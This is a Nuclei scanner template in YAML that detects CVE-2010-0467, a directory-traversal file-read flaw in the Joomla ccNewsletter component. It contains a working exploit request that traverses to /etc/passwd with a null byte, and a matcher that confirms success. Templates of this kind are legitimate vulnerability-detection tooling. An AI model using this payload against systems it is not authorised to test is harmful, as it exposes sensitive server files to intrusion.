45 lines
1.8 KiB
YAML
45 lines
1.8 KiB
YAML
id: CVE-2010-0467
|
|
|
|
info:
|
|
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
|
|
remediation: Apply all relevant security patches and upgrades.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/11282
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-0467
|
|
- http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
|
|
- http://www.exploit-db.com/exploits/11277
|
|
- http://www.exploit-db.com/exploits/11282
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
|
cvss-score: 5.8
|
|
cve-id: CVE-2010-0467
|
|
cwe-id: CWE-22
|
|
epss-score: 0.06955
|
|
epss-percentile: 0.93927
|
|
cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: chillcreations
|
|
product: com_ccnewsletter
|
|
tags: cve2010,cve,joomla,lfi,edb,chillcreations
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502200ffa1c79f56c51843e4ae33aade889343bc08e2cd48e34c96a18b426025d6fe8022100f0293ac85b2c273b5a96d641fd43b6aedb6c0408da0ddd0729d63ca2e87e81ca:922c64590222798bb761d5b6d8e72950 |